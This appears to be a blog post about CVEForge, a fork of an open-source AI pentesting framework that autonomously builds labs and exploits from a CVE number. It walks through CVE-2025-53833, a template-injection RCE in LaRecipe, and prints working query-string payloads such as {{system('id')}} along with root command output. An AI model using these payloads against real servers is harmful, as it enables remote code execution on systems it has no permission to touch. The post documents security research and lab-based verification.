After the GVFS experiment , we had a question that wouldn’t go away. That was one prompt, one CVE, one lucky afternoon. What if we could do it for any CVE? Feed it a number, walk away, come back to a complete lab and a working PoC?
We didn’t want to build it from scratch. We wanted to find something that already worked and bend it.
Shannon
If you haven’t seen Shannon , you should. It’s an open-source autonomous AI pentesting framework built by Keygraph . You give it a URL and a source repo, and it runs 13 agents across 5 phases - reconnaissance, vulnerability analysis, exploitation, reporting - all orchestrated through Temporal with Claude under the hood. It has crash recovery, parallel agent execution, audit logging, git checkpoints per agent, MCP tool integration, the works.
We’d been watching the project for a while. What struck us wasn’t just that it worked - it’s how it worked. The architecture is beautifully domain-agnostic under the surface. The agent execution engine doesn’t know it’s doing pentesting. It takes a name, loads a prompt, runs Claude with MCP tools, validates the output, commits the result. The Temporal workflow just sequences phases. The prompt system does variable substitution and partial includes. All the pentest-specific knowledge lives in the prompts and the agent registry - not in the infrastructure.
That’s the kind of design you can fork.
The Fork
We copied Shannon and started ripping out everything web-pentest-specific. The 13 agents became 6. The Playwright browser MCP server became the EIP MCP server. Nmap, subfinder, and WhatWeb got replaced with Docker CLI access. The URL input became a CVE number. The vulnerability queue became a workspace directory.
What we kept was everything that made Shannon good: the Temporal orchestration, the agent execution lifecycle, the audit logging, the error handling with automatic retries, the git checkpoint system, the prompt engine. Roughly 60% of the codebase carried over unchanged. Shannon’s authors built something genuinely reusable, and we’re grateful for it.
The new pipeline has six agents in five sequential phases:
- Intel - Queries the EIP MCP server for the full CVE brief. Finds the source repo, clones it, checks out the vulnerable version.
- Analysis - Reads the fix diff, traces the vulnerable code path, identifies the root cause, assesses whether the fix is complete.
- Lab Build - Generates Dockerfiles and docker-compose.yml, builds containers for both vulnerable and patched versions, verifies they start.
- PoC & Verify - Writes a standalone exploit script, tests it against the vulnerable container (must succeed), tests against the patched container (must fail).
- Report - Generates a README with the full writeup.
- Bypass (conditional) - If the analysis flagged the fix as potentially incomplete, attempts to construct an input that evades it.
Each agent gets the deliverables from the previous phase. The intel agent’s brief feeds the analysis. The analysis feeds the lab builder. The lab builder’s container IPs feed the PoC writer. It’s a pipeline where each stage builds on real artifacts, not summaries.
The First Real Run
We needed a test case. Something with enough complexity to be interesting but not so obscure that the agent would be flying blind. We picked CVE-2025-53833 - a Server-Side Template Injection in LaRecipe , a Laravel documentation package. CVSS 10.0. Unauthenticated RCE via a single GET request. And crucially: zero existing working PoC code in the wild.
EIP had the CVE brief, the GHSA advisory, and a writeup - but no runnable exploit. The one public GitHub repository tagged for this CVE was classified as a writeup, not a working PoC. So this wasn’t a case of the agent copying someone else’s exploit. It would need to understand the vulnerability from the advisory and source code, then write one from scratch.
We typed one command:
./cveforge start CVE=CVE-2025-53833
Then we watched the logs.
What Happened Next
The intel agent pulled the full brief from EIP in its first tool call. CVE details, CVSS vector, CWE classification, fix commit hash, exploit analysis, Nuclei templates. It cloned the LaRecipe repo, found the fix commit (c1d0d56), identified the vulnerable version (2.8.0) and the patched version (2.8.1). Three and a half minutes.
The analysis agent read the fix diff and traced the attack chain:
GET /docs/1.0/overview?{{system('id')}}
-> replaceLinks() injects raw URI into HTML content
-> renderBlade() -> Blade::compileString()
-> eval('?'.'>'.$content)
-> RCE
The method replaceLinks() used request()->getRequestUri() - which includes the query string - to build anchor links in rendered documentation. That query string passed through Laravel’s Blade template engine and got eval()’d. The fix switched to getPathInfo(), which strips the query string. Six minutes for the full analysis, including fix completeness assessment.
Then the lab agent started building Docker containers. This is where it got interesting.
The Struggle (Honest Version)
The lab agent hit three problems that we hadn’t anticipated.
Problem 1: Docker-in-Docker networking. The CVEForge worker runs inside a Docker container. The lab containers it builds are sibling containers on the host Docker daemon. Port mappings like 8080:80 expose to the host machine, not to the worker container. The agent tried curl http://localhost:8081 and got connection refused. It took about fifteen turns before it figured out to use docker inspect to get container IPs and curl those directly.
Problem 2: Composer blocks vulnerable packages. When the agent tried to composer require binarytorch/larecipe:2.8.0, Composer refused - the package has a known security advisory. The agent had to discover the --no-audit flag on its own.
Problem 3: PHP 8.1 broke an old dependency. ParsedownExtra, a Markdown library that LaRecipe depends on, has an undefined array key access that’s harmless on PHP 7.x but throws a fatal ErrorException on PHP 8.1+ because Laravel’s error handler converts warnings to exceptions. The agent tried suppressing it via error_reporting ini settings. That didn’t work - Laravel overrides error_reporting at runtime. Eventually it figured out the right fix: patch the source directly with sed.
None of these problems were in the prompt. The agent debugged them live, iterating through solutions until it found ones that worked. Fourteen minutes for the lab build, including all the false starts.
After the run, we baked all three lessons into the prompts so future agents don’t waste turns on the same issues. That’s the loop: run, learn, encode, run again.
The PoC
The PoC agent read the previous deliverables, confirmed the containers were running, and wrote a standalone Python exploit. No external dependencies - just stdlib (socket for raw TCP, re for output extraction).
It used raw sockets instead of http.client because Python 3.13+ rejects { and } in URLs. The payload is a Blade echo directive injected via the query string:
GET /docs/1.0/overview?{{system('id')}} HTTP/1.1
For commands with spaces, it wraps in PHP’s urldecode():
GET /docs/1.0/overview?{{system(urldecode('uname%20-a'))}} HTTP/1.1
Seven tests. Four against the vulnerable container - id, whoami, uname -a, hostname - all returning command output. Three against the patched container - all blocked. The PoC agent verified the fix works exactly as described: getPathInfo() strips the query string, so the payload never reaches the template engine.
[+] VULNERABLE! Command output extracted:
uid=0(root) gid=0(root) groups=0(root)
[+] Server-Side Template Injection confirmed - RCE achieved!
Six minutes and forty seconds for the PoC, including writing the script, testing all seven cases, and generating the verification report.
The Numbers
| Phase | Agent | Duration | Cost |
|---|---|---|---|
| Intel | intel | 3m 31s | $0.86 |
| Analysis | analysis | 6m 5s | $1.03 |
| Lab Build | lab | 14m 46s | $3.16 |
| PoC & Verify | poc | 6m 40s | $2.21 |
| Report | report | 1m 33s | $0.45 |
| Bypass | bypass | skipped | - |
| Total | 32m 37s | $7.71 |
The bypass agent was skipped because the analysis concluded the fix was complete. getPathInfo() never includes query parameters - there’s no way to sneak a payload through the patched code path. The correct call for this CVE.
What Came Out
The pipeline produced a complete package:
- README.md - Full writeup with root cause analysis, lab setup instructions, PoC usage, verification results, fix explanation
- poc/poc.py - Standalone RCE exploit, zero dependencies, works against any LaRecipe < 2.8.1 instance
- lab/ - Docker Compose environment with vulnerable (v2.8.0) and patched (v2.8.1) containers
- deliverables/ - Intel brief, vulnerability analysis, lab build report, PoC verification report
The full lab and PoC are on GitHub .
What the EIP MCP Server Did
Same pattern as the GVFS experiment . The MCP connection gave the intel agent everything in its first tool call - severity, CWE, fix commit, affected versions, existing exploit analysis, Nuclei templates, upstream references. No tab-switching, no copy-pasting from five different sources.
But this time it wasn’t just one agent using it. The intel agent queried get_vulnerability, get_exploit_analysis, get_exploit_code, and get_nuclei_templates - all in the first three minutes. The PoC agent used get_exploit_analysis to check if the existing public writeup was safe to reference (not a trojan). The intelligence flowed through the pipeline as context, not just as a starting point.
What Shannon Made Possible
We want to be clear about this: we didn’t build an autonomous agent framework. Shannon’s team did. We took their architecture - the Temporal orchestration, the agent execution lifecycle, the MCP integration, the audit system, the retry logic, the prompt engine - and repointed it at a different problem. The hard infrastructure work was already done.
What we contributed was the domain adaptation: six new agent prompts, EIP MCP wiring, Docker socket access for lab building, the CVE-specific workflow, and the lessons-learned loop. That’s meaningful work, but it’s built on a foundation that somebody else designed and tested extensively.
If you’re building anything that involves autonomous AI agents running in sequence with tools, crash recovery, and audit logging, Shannon is worth studying. The architecture is clean and the code is readable. We learned a lot from it.
What’s Next
CVEForge is rough. The prompts need more iterations across different vulnerability classes - we’ve only tested it on one CVE end-to-end. The lab build phase is the slowest and most fragile, because build systems vary enormously. The error handling around Docker networking needs work. The cost ($7.71 per run with Opus) could come down with smarter model routing.
But it works. One CVE number in, complete PoC lab out. 32 minutes, fully autonomous, for a CVSS 10.0 vulnerability that had no existing public exploit.
We’ll release CVEForge once we’ve polished it - run it against a wider range of CVEs, harden the prompts, clean up the rough edges. In the meantime, if you want to try the piece that makes the intelligence layer work, the EIP MCP server is free and open.
One CVE number. Six agents. Old-school exploit development, automated.
CVEForge Series:
- From CRLF Injection PoC to Fix Bypass - the one-prompt precursor
- CVE-2025-53833: From CVE Number to Root Shell in 32 Minutes - you are here
- Zero to RCE: Three Vulnerability Classes - three CVEs, three PoCs, one bypass
- OneBlog: 3 Bypasses in 5 Runs - the Java case study
- Foreman & Telnetd - two CVEs, two very different fixes
- 72 Hours, 24 CVEs - the stress test
- The One That Failed - when the pipeline hits a wall